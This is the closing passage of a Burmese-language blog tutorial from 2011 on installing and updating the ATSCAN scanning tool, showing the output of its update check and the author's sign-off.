  ===================================================
  - Add --source argument to retreive source code.
  - Enjoy!

Update ျဖစ္သြားျပီျဖစ္ေၾကာင္း message ရလာပါျပီ။
ကဲ ဒါဆိုရင္ေတာ့ ကြ်န္ေတာ္တို႔ ATSCAN ကို ေကာင္းမြန္စြာ အသံုးျပဳလို႔ ရျပီျဖစ္ပါတယ္။
ခုေနမွာ update ျပန္စစ္ၾကည့္လိုက္ရင္ေတာ့ atscan --update မွာ
--
[!] Please wait...
[!] Checking for updates..
[!] The tool is up to date!
လို႔သာ ေတြ႕ရေတာ့မွာျဖစ္ပါတယ္။
................................................................................................................................................


Thanks


Khit Minnyo
comments | | Read More...
 
Copyright © 2011. Khit Minnyo . All Rights Reserved.